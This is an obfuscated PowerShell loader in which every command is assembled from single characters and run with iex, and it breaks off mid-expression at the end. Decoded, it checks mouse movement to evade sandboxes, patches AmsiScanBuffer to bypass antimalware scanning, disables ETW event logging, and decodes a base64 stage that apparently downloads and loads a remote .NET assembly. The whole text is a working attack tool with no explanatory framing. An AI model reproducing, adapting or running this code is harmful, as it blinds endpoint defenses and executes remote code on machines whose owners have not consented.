$0='A';$1='d';$2='d';$3='-';$4='T';$5='y';$6='p';$7='e';$8=' ';$9='-';$10='A';$11='s';$12='s';$13='e';$14='m';$15='b';$16='l';$17='y';$18='N';$19='a';$20='m';$21='e';$22=' ';$23='S';$24='y';$25='s';$26='t';$27='e';$28='m';$29='.';$30='W';$31='i';$32='n';$33='d';$34='o';$35='w';$36='s';$37='.';$38='F';$39='o';$40='r';$41='m';$42='s';$43='
';$j= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$11+$12+$13+$14+$15+$16+$17+$18+$19+$20+$21+$22+$23+$24+$25+$26+$27+$28+$29+$30+$31+$32+$33+$34+$35+$36+$37+$38+$39+$40+$41+$42+$43+$j);$0='
';$V= ' ';iex($0+$V);$0='$';$1='s';$2='e';$3='c';$4='s';$5=' ';$6='=';$7=' ';$8='1';$9='0';$10='
';$U= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$U);$0='i';$1='f';$2=' ';$3='(';$4='$';$5='A';$6='r';$7='g';$8='s';$9='.';$10='c';$11='o';$12='u';$13='n';$14='t';$15=' ';$16='-';$17='e';$18='q';$19=' ';$20='1';$21=')';$22=' ';$23='{';$24='$';$25='s';$26='e';$27='c';$28='s';$29=' ';$30='=';$31=' ';$32='$';$33='(';$34='$';$35='a';$36='r';$37='g';$38='s';$39='[';$40='0';$41=']';$42=')';$43='}';$44=' ';$45='
';$e= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$11+$12+$13+$14+$15+$16+$17+$18+$19+$20+$21+$22+$23+$24+$25+$26+$27+$28+$29+$30+$31+$32+$33+$34+$35+$36+$37+$38+$39+$40+$41+$42+$43+$44+$45+$e);$0='
';$r= ' ';iex($0+$r);$0='A';$1='d';$2='d';$3='-';$4='T';$5='y';$6='p';$7='e';$8=' ';$9='-';$10='A';$11='s';$12='s';$13='e';$14='m';$15='b';$16='l';$17='y';$18='N';$19='a';$20='m';$21='e';$22=' ';$23='S';$24='y';$25='s';$26='t';$27='e';$28='m';$29='.';$30='W';$31='i';$32='n';$33='d';$34='o';$35='w';$36='s';$37='.';$38='F';$39='o';$40='r';$41='m';$42='s';$43='
';$z= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$11+$12+$13+$14+$15+$16+$17+$18+$19+$20+$21+$22+$23+$24+$25+$26+$27+$28+$29+$30+$31+$32+$33+$34+$35+$36+$37+$38+$39+$40+$41+$42+$43+$z);$0='
';$d= ' ';iex($0+$d);$0='$';$1='x';$2='1';$3=' ';$4='=';$5=' ';$6='[';$7='S';$8='y';$9='s';$10='t';$11='e';$12='m';$13='.';$14='W';$15='i';$16='n';$17='d';$18='o';$19='w';$20='s';$21='.';$22='F';$23='o';$24='r';$25='m';$26='s';$27='.';$28='C';$29='u';$30='r';$31='s';$32='o';$33='r';$34=']';$35=':';$36=':';$37='P';$38='o';$39='s';$40='i';$41='t';$42='i';$43='o';$44='n';$45='.';$46='X';$47='
';$G= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$11+$12+$13+$14+$15+$16+$17+$18+$19+$20+$21+$22+$23+$24+$25+$26+$27+$28+$29+$30+$31+$32+$33+$34+$35+$36+$37+$38+$39+$40+$41+$42+$43+$44+$45+$46+$47+$G);$0='$';$1='y';$2='1';$3=' ';$4='=';$5=' ';$6='[';$7='S';$8='y';$9='s';$10='t';$11='e';$12='m';$13='.';$14='W';$15='i';$16='n';$17='d';$18='o';$19='w';$20='s';$21='.';$22='F';$23='o';$24='r';$25='m';$26='s';$27='.';$28='C';$29='u';$30='r';$31='s';$32='o';$33='r';$34=']';$35=':';$36=':';$37='P';$38='o';$39='s';$40='i';$41='t';$42='i';$43='o';$44='n';$45='.';$46='Y';$47='
';$F= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$11+$12+$13+$14+$15+$16+$17+$18+$19+$20+$21+$22+$23+$24+$25+$26+$27+$28+$29+$30+$31+$32+$33+$34+$35+$36+$37+$38+$39+$40+$41+$42+$43+$44+$45+$46+$47+$F);$0='W';$1='r';$2='i';$3='t';$4='e';$5='-';$6='O';$7='u';$8='t';$9='p';$10='u';$11='t';$12=' ';$13='"';$14='T';$15='h';$16='e';$17=' ';$18='c';$19='o';$20='o';$21='r';$22='d';$23='i';$24='n';$25='a';$26='t';$27='e';$28='s';$29=' ';$30='o';$31='f';$32=' ';$33='t';$34='h';$35='e';$36=' ';$37='c';$38='u';$39='r';$40='s';$41='o';$42='r';$43=' ';$44='a';$45='r';$46='e';$47=' ';$48='c';$49='u';$50='r';$51='r';$52='e';$53='n';$54='t';$55='l';$56='y';$57=' ';$58='x';$59=':';$60=' ';$61='$';$62='x';$63='1';$64=',';$65=' ';$66='y';$67=':';$68=' ';$69='$';$70='y';$71='1';$72='"';$73='
';$a= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$11+$12+$13+$14+$15+$16+$17+$18+$19+$20+$21+$22+$23+$24+$25+$26+$27+$28+$29+$30+$31+$32+$33+$34+$35+$36+$37+$38+$39+$40+$41+$42+$43+$44+$45+$46+$47+$48+$49+$50+$51+$52+$53+$54+$55+$56+$57+$58+$59+$60+$61+$62+$63+$64+$65+$66+$67+$68+$69+$70+$71+$72+$73+$a);$0='
';$r= ' ';iex($0+$r);$0='S';$1='t';$2='a';$3='r';$4='t';$5='-';$6='S';$7='l';$8='e';$9='e';$10='p';$11=' ';$12='$';$13='s';$14='e';$15='c';$16='s';$17='
';$H= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$11+$12+$13+$14+$15+$16+$17+$H);$0='
';$j= ' ';iex($0+$j);$0='$';$1='x';$2='2';$3=' ';$4='=';$5=' ';$6='[';$7='S';$8='y';$9='s';$10='t';$11='e';$12='m';$13='.';$14='W';$15='i';$16='n';$17='d';$18='o';$19='w';$20='s';$21='.';$22='F';$23='o';$24='r';$25='m';$26='s';$27='.';$28='C';$29='u';$30='r';$31='s';$32='o';$33='r';$34=']';$35=':';$36=':';$37='P';$38='o';$39='s';$40='i';$41='t';$42='i';$43='o';$44='n';$45='.';$46='X';$47='
';$w= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$11+$12+$13+$14+$15+$16+$17+$18+$19+$20+$21+$22+$23+$24+$25+$26+$27+$28+$29+$30+$31+$32+$33+$34+$35+$36+$37+$38+$39+$40+$41+$42+$43+$44+$45+$46+$47+$w);$0='$';$1='y';$2='2';$3=' ';$4='=';$5=' ';$6='[';$7='S';$8='y';$9='s';$10='t';$11='e';$12='m';$13='.';$14='W';$15='i';$16='n';$17='d';$18='o';$19='w';$20='s';$21='.';$22='F';$23='o';$24='r';$25='m';$26='s';$27='.';$28='C';$29='u';$30='r';$31='s';$32='o';$33='r';$34=']';$35=':';$36=':';$37='P';$38='o';$39='s';$40='i';$41='t';$42='i';$43='o';$44='n';$45='.';$46='Y';$47='
';$s= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$11+$12+$13+$14+$15+$16+$17+$18+$19+$20+$21+$22+$23+$24+$25+$26+$27+$28+$29+$30+$31+$32+$33+$34+$35+$36+$37+$38+$39+$40+$41+$42+$43+$44+$45+$46+$47+$s);$0='W';$1='r';$2='i';$3='t';$4='e';$5='-';$6='O';$7='u';$8='t';$9='p';$10='u';$11='t';$12=' ';$13='"';$14='A';$15='f';$16='t';$17='e';$18='r';$19=' ';$20='s';$21='l';$22='e';$23='e';$24='p';$25='i';$26='n';$27='g';$28=' ';$29='$';$30='s';$31='e';$32='c';$33='s';$34=' ';$35='s';$36='e';$37='c';$38='o';$39='n';$40='d';$41='s';$42=',';$43=' ';$44='t';$45='h';$46='e';$47=' ';$48='c';$49='o';$50='o';$51='r';$52='d';$53='i';$54='n';$55='a';$56='t';$57='e';$58='s';$59=' ';$60='o';$61='f';$62=' ';$63='t';$64='h';$65='e';$66=' ';$67='c';$68='u';$69='r';$70='s';$71='o';$72='r';$73=' ';$74='a';$75='r';$76='e';$77=' ';$78='n';$79='o';$80='w';$81=' ';$82='x';$83=':';$84=' ';$85='$';$86='x';$87='2';$88=',';$89=' ';$90='y';$91=':';$92=' ';$93='$';$94='y';$95='2';$96='"';$97='
';$f= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$11+$12+$13+$14+$15+$16+$17+$18+$19+$20+$21+$22+$23+$24+$25+$26+$27+$28+$29+$30+$31+$32+$33+$34+$35+$36+$37+$38+$39+$40+$41+$42+$43+$44+$45+$46+$47+$48+$49+$50+$51+$52+$53+$54+$55+$56+$57+$58+$59+$60+$61+$62+$63+$64+$65+$66+$67+$68+$69+$70+$71+$72+$73+$74+$75+$76+$77+$78+$79+$80+$81+$82+$83+$84+$85+$86+$87+$88+$89+$90+$91+$92+$93+$94+$95+$96+$97+$f);$0='
';$Y= ' ';iex($0+$Y);$0='i';$1='f';$2=' ';$3='(';$4='$';$5='x';$6='1';$7=' ';$8='-';$9=' ';$10='$';$11='x';$12='2';$13=' ';$14='-';$15='e';$16='q';$17=' ';$18='0';$19=' ';$20='-';$21='a';$22='n';$23='d';$24=' ';$25='$';$26='y';$27='1';$28=' ';$29='-';$30=' ';$31='$';$32='y';$33='2';$34=' ';$35='-';$36='e';$37='q';$38=' ';$39='0';$40=')';$41=' ';$42='{';$43='e';$44='c';$45='h';$46='o';$47=' ';$48='"';$49='t';$50='a';$51=' ';$52='p';$53='o';$54=' ';$55='b';$56='o';$57='u';$58='j';$59='i';$60='"';$61=';';$62=' ';$63='E';$64='x';$65='i';$66='t';$67=' ';$68='}';$69='
';$D= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$11+$12+$13+$14+$15+$16+$17+$18+$19+$20+$21+$22+$23+$24+$25+$26+$27+$28+$29+$30+$31+$32+$33+$34+$35+$36+$37+$38+$39+$40+$41+$42+$43+$44+$45+$46+$47+$48+$49+$50+$51+$52+$53+$54+$55+$56+$57+$58+$59+$60+$61+$62+$63+$64+$65+$66+$67+$68+$69+$D);$0='
';$f= ' ';iex($0+$f);$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {

    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);

    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
$0='A';$1='d';$2='d';$3='-';$4='T';$5='y';$6='p';$7='e';$8=' ';$9='$';$10='W';$11='i';$12='n';$13='3';$14='2';$15=';';$16='$';$17='L';$18='o';$19='a';$20='d';$21='L';$22='i';$23='b';$24='r';$25='a';$26='r';$27='y';$28=' ';$29='=';$30=' ';$31='[';$32='W';$33='i';$34='n';$35='3';$36='2';$37=']';$38=':';$39=':';$40='L';$41='o';$42='a';$43='d';$44='L';$45='i';$46='b';$47='r';$48='a';$49='r';$50='y';$51='(';$52='"';$53='a';$54='m';$55='"';$56=' ';$57='+';$58=' ';$59='"';$60='s';$61='i';$62='.';$63='d';$64='l';$65='l';$66='"';$67=')';$68='
';$Q= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$11+$12+$13+$14+$15+$16+$17+$18+$19+$20+$21+$22+$23+$24+$25+$26+$27+$28+$29+$30+$31+$32+$33+$34+$35+$36+$37+$38+$39+$40+$41+$42+$43+$44+$45+$46+$47+$48+$49+$50+$51+$52+$53+$54+$55+$56+$57+$58+$59+$60+$61+$62+$63+$64+$65+$66+$67+$68+$Q);$0='$';$1='A';$2='d';$3='d';$4='r';$5='e';$6='s';$7='s';$8=' ';$9='=';$10=' ';$11='[';$12='W';$13='i';$14='n';$15='3';$16='2';$17=']';$18=':';$19=':';$20='G';$21='e';$22='t';$23='P';$24='r';$25='o';$26='c';$27='A';$28='d';$29='d';$30='r';$31='e';$32='s';$33='s';$34='(';$35='$';$36='L';$37='o';$38='a';$39='d';$40='L';$41='i';$42='b';$43='r';$44='a';$45='r';$46='y';$47=',';$48=' ';$49='"';$50='A';$51='m';$52='s';$53='i';$54='"';$55=' ';$56='+';$57=' ';$58='"';$59='S';$60='c';$61='a';$62='n';$63='"';$64=' ';$65='+';$66=' ';$67='"';$68='B';$69='u';$70='f';$71='f';$72='e';$73='r';$74='"';$75=')';$76='
';$V= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$11+$12+$13+$14+$15+$16+$17+$18+$19+$20+$21+$22+$23+$24+$25+$26+$27+$28+$29+$30+$31+$32+$33+$34+$35+$36+$37+$38+$39+$40+$41+$42+$43+$44+$45+$46+$47+$48+$49+$50+$51+$52+$53+$54+$55+$56+$57+$58+$59+$60+$61+$62+$63+$64+$65+$66+$67+$68+$69+$70+$71+$72+$73+$74+$75+$76+$V);$0='$';$1='p';$2=' ';$3='=';$4=' ';$5='0';$6='
';$t= ' ';iex($0+$1+$2+$3+$4+$5+$6+$t);$0='[';$1='W';$2='i';$3='n';$4='3';$5='2';$6=']';$7=':';$8=':';$9='V';$10='i';$11='r';$12='t';$13='u';$14='a';$15='l';$16='P';$17='r';$18='o';$19='t';$20='e';$21='c';$22='t';$23='(';$24='$';$25='A';$26='d';$27='d';$28='r';$29='e';$30='s';$31='s';$32=',';$33=' ';$34='[';$35='u';$36='i';$37='n';$38='t';$39='3';$40='2';$41=']';$42='5';$43=',';$44=' ';$45='0';$46='x';$47='4';$48='0';$49=',';$50=' ';$51='[';$52='r';$53='e';$54='f';$55=']';$56='$';$57='p';$58=')';$59='
';$D= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$11+$12+$13+$14+$15+$16+$17+$18+$19+$20+$21+$22+$23+$24+$25+$26+$27+$28+$29+$30+$31+$32+$33+$34+$35+$36+$37+$38+$39+$40+$41+$42+$43+$44+$45+$46+$47+$48+$49+$50+$51+$52+$53+$54+$55+$56+$57+$58+$59+$D);$0='$';$1='P';$2='a';$3='t';$4='c';$5='h';$6=' ';$7='=';$8=' ';$9='[';$10='B';$11='y';$12='t';$13='e';$14='[';$15=']';$16=']';$17=' ';$18='(';$19='0';$20='x';$21='B';$22='8';$23=',';$24=' ';$25='0';$26='x';$27='5';$28='7';$29=',';$30=' ';$31='0';$32='x';$33='0';$34='0';$35=',';$36=' ';$37='0';$38='x';$39='0';$40='7';$41=',';$42=' ';$43='0';$44='x';$45='8';$46='0';$47=',';$48=' ';$49='0';$50='x';$51='C';$52='3';$53=')';$54='
';$V= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$11+$12+$13+$14+$15+$16+$17+$18+$19+$20+$21+$22+$23+$24+$25+$26+$27+$28+$29+$30+$31+$32+$33+$34+$35+$36+$37+$38+$39+$40+$41+$42+$43+$44+$45+$46+$47+$48+$49+$50+$51+$52+$53+$54+$V);$0='[';$1='S';$2='y';$3='s';$4='t';$5='e';$6='m';$7='.';$8='R';$9='u';$10='n';$11='t';$12='i';$13='m';$14='e';$15='.';$16='I';$17='n';$18='t';$19='e';$20='r';$21='o';$22='p';$23='S';$24='e';$25='r';$26='v';$27='i';$28='c';$29='e';$30='s';$31='.';$32='M';$33='a';$34='r';$35='s';$36='h';$37='a';$38='l';$39=']';$40=':';$41=':';$42='C';$43='o';$44='p';$45='y';$46='(';$47='$';$48='P';$49='a';$50='t';$51='c';$52='h';$53=',';$54=' ';$55='0';$56=',';$57=' ';$58='$';$59='A';$60='d';$61='d';$62='r';$63='e';$64='s';$65='s';$66=',';$67=' ';$68='6';$69=')';$70='
';$Z= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$11+$12+$13+$14+$15+$16+$17+$18+$19+$20+$21+$22+$23+$24+$25+$26+$27+$28+$29+$30+$31+$32+$33+$34+$35+$36+$37+$38+$39+$40+$41+$42+$43+$44+$45+$46+$47+$48+$49+$50+$51+$52+$53+$54+$55+$56+$57+$58+$59+$60+$61+$62+$63+$64+$65+$66+$67+$68+$69+$70+$Z);$0='
';$c= ' ';iex($0+$c);$0='[';$1='R';$2='e';$3='f';$4='l';$5='e';$6='c';$7='t';$8='i';$9='o';$10='n';$11='.';$12='A';$13='s';$14='s';$15='e';$16='m';$17='b';$18='l';$19='y';$20=']';$21=':';$22=':';$23='L';$24='o';$25='a';$26='d';$27='W';$28='i';$29='t';$30='h';$31='P';$32='a';$33='r';$34='t';$35='i';$36='a';$37='l';$38='N';$39='a';$40='m';$41='e';$42='(';$43="'";$44='S';$45='y';$46='s';$47='t';$48='e';$49='m';$50='.';$51='C';$52='o';$53='r';$54='e';$55="'";$56=')';$57='.';$58='G';$59='e';$60='t';$61='T';$62='y';$63='p';$64='e';$65='(';$66="'";$67='S';$68='y';$69='s';$70='t';$71='e';$72='m';$73='.';$74='D';$75='i';$76='a';$77='g';$78='n';$79='o';$80='s';$81='t';$82='i';$83='c';$84='s';$85='.';$86='E';$87='v';$88='e';$89='n';$90='t';$91='i';$92='n';$93='g';$94='.';$95='E';$96='v';$97='e';$98='n';$99='t';$100='P';$101='r';$102='o';$103='v';$104='i';$105='d';$106='e';$107='r';$108="'";$109=')';$110='.';$111='G';$112='e';$113='t';$114='F';$115='i';$116='e';$117='l';$118='d';$119='(';$120="'";$121='m';$122='_';$123='e';$124='n';$125='a';$126='b';$127='l';$128='e';$129='d';$130="'";$131=',';$132="'";$133='N';$134='o';$135='n';$136='P';$137='u';$138='b';$139='l';$140='i';$141='c';$142=',';$143='I';$144='n';$145='s';$146='t';$147='a';$148='n';$149='c';$150='e';$151="'";$152=')';$153='.';$154='S';$155='e';$156='t';$157='V';$158='a';$159='l';$160='u';$161='e';$162='(';$163='[';$164='R';$165='e';$166='f';$167=']';$168='.';$169='A';$170='s';$171='s';$172='e';$173='m';$174='b';$175='l';$176='y';$177='.';$178='G';$179='e';$180='t';$181='T';$182='y';$183='p';$184='e';$185='(';$186="'";$187='S';$188='y';$189='s';$190='t';$191='e';$192='m';$193='.';$194='M';$195='a';$196='n';$197='a';$198='g';$199='e';$200='m';$201='e';$202='n';$203='t';$204='.';$205='A';$206='u';$207='t';$208='o';$209='m';$210='a';$211='t';$212='i';$213='o';$214='n';$215='.';$216='T';$217='r';$218='a';$219='c';$220='i';$221='n';$222='g';$223='.';$224='P';$225='S';$226='E';$227='t';$228='w';$229='L';$230='o';$231='g';$232='P';$233='r';$234='o';$235='v';$236='i';$237='d';$238='e';$239='r';$240="'";$241=')';$242='.';$243='G';$244='e';$245='t';$246='F';$247='i';$248='e';$249='l';$250='d';$251='(';$252="'";$253='e';$254='t';$255='w';$256='P';$257='r';$258='o';$259='v';$260='i';$261='d';$262='e';$263='r';$264="'";$265=',';$266="'";$267='N';$268='o';$269='n';$270='P';$271='u';$272='b';$273='l';$274='i';$275='c';$276=',';$277='S';$278='t';$279='a';$280='t';$281='i';$282='c';$283="'";$284=')';$285='.';$286='G';$287='e';$288='t';$289='V';$290='a';$291='l';$292='u';$293='e';$294='(';$295='$';$296='n';$297='u';$298='l';$299='l';$300=')';$301=',';$302='0';$303=')';$304='
';$R= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$11+$12+$13+$14+$15+$16+$17+$18+$19+$20+$21+$22+$23+$24+$25+$26+$27+$28+$29+$30+$31+$32+$33+$34+$35+$36+$37+$38+$39+$40+$41+$42+$43+$44+$45+$46+$47+$48+$49+$50+$51+$52+$53+$54+$55+$56+$57+$58+$59+$60+$61+$62+$63+$64+$65+$66+$67+$68+$69+$70+$71+$72+$73+$74+$75+$76+$77+$78+$79+$80+$81+$82+$83+$84+$85+$86+$87+$88+$89+$90+$91+$92+$93+$94+$95+$96+$97+$98+$99+$100+$101+$102+$103+$104+$105+$106+$107+$108+$109+$110+$111+$112+$113+$114+$115+$116+$117+$118+$119+$120+$121+$122+$123+$124+$125+$126+$127+$128+$129+$130+$131+$132+$133+$134+$135+$136+$137+$138+$139+$140+$141+$142+$143+$144+$145+$146+$147+$148+$149+$150+$151+$152+$153+$154+$155+$156+$157+$158+$159+$160+$161+$162+$163+$164+$165+$166+$167+$168+$169+$170+$171+$172+$173+$174+$175+$176+$177+$178+$179+$180+$181+$182+$183+$184+$185+$186+$187+$188+$189+$190+$191+$192+$193+$194+$195+$196+$197+$198+$199+$200+$201+$202+$203+$204+$205+$206+$207+$208+$209+$210+$211+$212+$213+$214+$215+$216+$217+$218+$219+$220+$221+$222+$223+$224+$225+$226+$227+$228+$229+$230+$231+$232+$233+$234+$235+$236+$237+$238+$239+$240+$241+$242+$243+$244+$245+$246+$247+$248+$249+$250+$251+$252+$253+$254+$255+$256+$257+$258+$259+$260+$261+$262+$263+$264+$265+$266+$267+$268+$269+$270+$271+$272+$273+$274+$275+$276+$277+$278+$279+$280+$281+$282+$283+$284+$285+$286+$287+$288+$289+$290+$291+$292+$293+$294+$295+$296+$297+$298+$299+$300+$301+$302+$303+$304+$R);$0='
';$z= ' ';iex($0+$z);
$0='$';$1='c';$2='c';$3='X';$4='X';$5='=';$6=' ';$7='"';$8='J';$9='H';$10='J';$11='Z';$12='Z';$13='S';$14='A';$15='9';$16='I';$17='C';$18='h';$19='p';$20='d';$21='3';$22='I';$23='g';$24='L';$25='V';$26='V';$27='z';$28='Z';$29='U';$30='J';$31='h';$32='c';$33='2';$34='l';$35='j';$36='U';$37='G';$38='F';$39='y';$40='c';$41='2';$42='l';$43='u';$44='Z';$45='y';$46='A';$47='i';$48='a';$49='H';$50='R';$51='0';$52='c';$53='H';$54='M';$55='6';$56='L';$57='y';$58='9';$59='n';$60='a';$61='X';$62='R';$63='o';$64='d';$65='W';$66='I';$67='u';$68='Y';$69='2';$70='9';$71='t';$72='L';$73='0';$74='d';$75='l';$76='d';$77='F';$78='J';$79='l';$80='a';$81='3';$82='R';$83='C';$84='b';$85='3';$86='k';$87='3';$88='M';$89='j';$90='Q';$91='v';$92='U';$93='2';$94='h';$95='h';$96='c';$97='n';$98='B';$99='V';$100='b';$101='m';$102='h';$103='v';$104='b';$105='2';$106='t';$107='l';$108='c';$109='i';$110='9';$111='y';$112='Y';$113='X';$114='c';$115='v';$116='b';$117='W';$118='F';$119='p';$120='b';$121='i';$122='9';$123='T';$124='a';$125='G';$126='F';$127='y';$128='c';$129='F';$130='V';$131='u';$132='a';$133='G';$134='9';$135='v';$136='a';$137='2';$138='V';$139='y';$140='L';$141='m';$142='R';$143='s';$144='b';$145='C';$146='I';$147='p';$148='L';$149='k';$150='N';$151='v';$152='b';$153='n';$154='R';$155='l';$156='b';$157='n';$158='Q';$159='K';$160='W';$161='1';$162='N';$163='5';$164='c';$165='3';$166='R';$167='l';$168='b';$169='S';$170='5';$171='S';$172='Z';$173='W';$174='Z';$175='s';$176='Z';$177='W';$178='N';$179='0';$180='a';$181='W';$182='9';$183='u';$184='L';$185='k';$186='F';$187='z';$188='c';$189='2';$190='V';$191='t';$192='Y';$193='m';$194='x';$195='5';$196='X';$197='T';$198='o';$199='6';$200='T';$201='G';$202='9';$203='h';$204='Z';$205='C';$206='g';$207='k';$208='c';$209='l';$210='l';$211='l';$212='K';$213='Q';$214='p';$215='b';$216='U';$217='2';$218='h';$219='h';$220='c';$221='n';$222='B';$223='V';$224='b';$225='m';$226='h';$227='v';$228='b';$229='2';$230='t';$231='l';$232='c';$233='l';$234='0';$235='6';$236='O';$237='k';$238='1';$239='h';$240='a';$241='W';$242='4';$243='o';$244='K';$245='Q';$246='o';$247='k';$248='c';$249='G';$250='l';$251='s';$252='b';$253='2';$254='Q';$255='g';$256='P';$257='S';$258='A';$259='o';$260='a';$261='X';$262='d';$263='y';$264='I';$265='C';$266='1';$267='V';$268='c';$269='2';$270='V';$271='C';$272='Y';$273='X';$274='N';$275='p';$276='Y';$277='1';$278='B';$279='h';$280='c';$281='n';$282='N';$283='p';$284='b';$285='m';$286='c';$287='g';$288='I';$289='m';$290='h';$291='0';$292='d';$293='H';$294='B';$295='z';$296='O';$297='i';$298='8';$299='v';$300='Z';$301='2';$302='l';$303='0';$304='a';$305='H';$306='V';$307='i';$308='L';$309='m';$310='N';$311='v';$312='b';$313='S';$314='8';$315='x';$316='b';$317='D';$318='F';$319='s';$320='M';$321='W';$322='w';$323='x';$324='b';$325='C';$326='8';$327='x';$328='a';$329='j';$330='F';$331='q';$332='M';$333='W';$334='o';$335='x';$336='a';$337='i';$338='9';$339='y';$340='Y';$341='X';$342='c';$343='v';$344='b';$345='W';$346='F';$347='p';$348='b';$349='i';$350='9';$351='k';$352='I';$353='i';$354='k';$355='u';$356='Q';$357='2';$358='9';$359='u';$360='d';$361='G';$362='V';$363='u';$364='d';$365='A';$366='o';$367='k';$368='Y';$369='n';$370='l';$371='0';$372='Z';$373='X';$374='M';$375='g';$376='P';$377='S';$378='B';$379='b';$380='U';$381='3';$382='l';$383='z';$384='d';$385='G';$386='V';$387='t';$388='L';$389='k';$390='N';$391='v';$392='b';$393='n';$394='Z';$395='l';$396='c';$397='n';$398='R';$399='d';$400='O';$401='j';$402='p';$403='G';$404='c';$405='m';$406='9';$407='t';$408='Q';$409='m';$410='F';$411='z';$412='Z';$413='T';$414='Y';$415='0';$416='U';$417='3';$418='R';$419='y';$420='a';$421='W';$422='5';$423='n';$424='K';$425='C';$426='R';$427='w';$428='a';$429='W';$430='x';$431='v';$432='Z';$433='C';$434='k';$435='K';$436='J';$437='G';$438='F';$439='z';$440='c';$441='2';$442='V';$443='t';$444='Y';$445='m';$446='x';$447='5';$448='I';$449='D';$450='0';$451='g';$452='W';$453='1';$454='N';$455='5';$456='c';$457='3';$458='R';$459='l';$460='b';$461='S';$462='5';$463='S';$464='Z';$465='W';$466='Z';$467='s';$468='Z';$469='W';$470='N';$471='0';$472='a';$473='W';$474='9';$475='u';$476='L';$477='k';$478='F';$479='z';$480='c';$481='2';$482='V';$483='t';$484='Y';$485='m';$486='x';$487='5';$488='X';$489='T';$490='o';$491='6';$492='T';$493='G';$494='9';$495='h';$496='Z';$497='C';$498='g';$499='k';$500='Y';$501='n';$502='l';$503='0';$504='Z';$505='X';$506='M';$507='p';$508='C';$509='l';$510='t';$511='T';$512='e';$513='X';$514='N';$515='0';$516='Z';$517='W';$518='0';$519='u';$520='U';$521='m';$522='V';$523='m';$524='b';$525='G';$526='V';$527='j';$528='d';$529='G';$530='l';$531='v';$532='b';$533='i';$534='5';$535='B';$536='c';$537='3';$538='N';$539='l';$540='b';$541='W';$542='J';$543='s';$544='e';$545='V';$546='0';$547='6';$548='O';$549='k';$550='x';$551='v';$552='Y';$553='W';$554='Q';$555='o';$556='J';$557='G';$558='J';$559='5';$560='d';$561='G';$562='V';$563='z';$564='K';$565='Q';$566='p';$567='b';$568='T';$569='G';$570='9';$571='h';$572='Z';$573='G';$574='V';$575='y';$576='L';$577='l';$578='B';$579='y';$580='b';$581='2';$582='d';$583='y';$584='Y';$585='W';$586='1';$587='d';$588='O';$589='j';$590='p';$591='N';$592='Y';$593='W';$594='l';$595='u';$596='K';$597='C';$598='k';$599='=';$600='"';$601=';';$602=' ';$603='[';$604='S';$605='y';$606='s';$607='t';$608='e';$609='m';$610='.';$611='T';$612='e';$613='x';$614='t';$615='.';$616='E';$617='n';$618='c';$619='o';$620='d';$621='i';$622='n';$623='g';$624=']';$625=':';$626=':';$627='A';$628='S';$629='C';$630='I';$631='I';$632='.';$633='G';$634='e';$635='t';$636='S';$637='t';$638='r';$639='i';$640='n';$641='g';$642='(';$643='[';$644='S';$645='y';$646='s';$647='t';$648='e';$649='m';$650='.';$651='C';$652='o';$653='n';$654='v';$655='e';$656='r';$657='t';$658=']';$659=':';$660=':';$661='F';$662='r';$663='o';$664='m';$665='B';$666='a';$667='s';$668='e';$669='6';$670='4';$671='S';$672='t';$673='r';$674='i';$675='n';$676='g';$677='(';$678='$';$679='c';$680='c';$681='X';$682='X';$683=')';$684=')';$685=' ';$686='|';$687=' ';$688='I';$689='E';$690='X';$c= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$11+$12+$13+$14+$15+$16+$17+$18+$19+$20+$21+$22+$23+$24+$25+$26+$27+$28+$29+$30+$31+$32+$33+$34+$35+$36+$37+$38+$39+$40+$41+$42+$43+$44+$45+$46+$47+$48+$49+$50+$51+$52+$53+$54+$55+$56+$57+$58+$59+$60+$61+$62+$63+$64+$65+$66+$67+$68+$69+$70+$71+$72+$73+$74+$75+$76+$77+$78+$79+$80+$81+$82+$83+$84+$85+$86+$87+$88+$89+$90+$91+$92+$93+$94+$95+$96+$97+$98+$99+$100+$101+$102+$103+$104+$105+$106+$107+$108+$109+$110+$111+$112+$113+$114+$115+$116+$117+$118+$119+$120+$121+$122+$123+$124+$125+$126+$127+$128+$129+$130+$131+$132+$133+$134+$135+$136+$137+$138+$139+$140+$141+$142+$143+$144+$145+$146+$147+$148+$149+$150+$151+$152+$153+$154+$155+$156+$157+$158+$159+$160+$161+$162+$163+$164+$165+$166+$167+$168+$169+$170+$171+$172+$173+$174+$175+$176+$177+$178+$179+$180+$181+$182+$183+$184+$185+$186+$187+$188+$189+$190+$191+$192+$193+$194+$195+$196+$197+$198+$199+$200+$201+$202+$203+$204+$205+$206+$207+$208+$209+$210+$211+$212+$213+$214+$215+$216+$217+$218+$219+$220+$221+$222+$223+$224+$225+$226+$227+$228+$229+$230+$231+$232+$233+$234+$235+$236+$237+$238+$239+$240+$241+$242+$243+$244+$245+$246+$247+$248+$249+$250+$251+$252+$253+$254+$255+$256+$257+$258+$259+$260+$261+$262+$263+$264+$265+$266+$267+$268+$269+$270+$271+$272+$273+$274+$275+$276+$277+$278+$279+$280+$281+$282+$283+$284+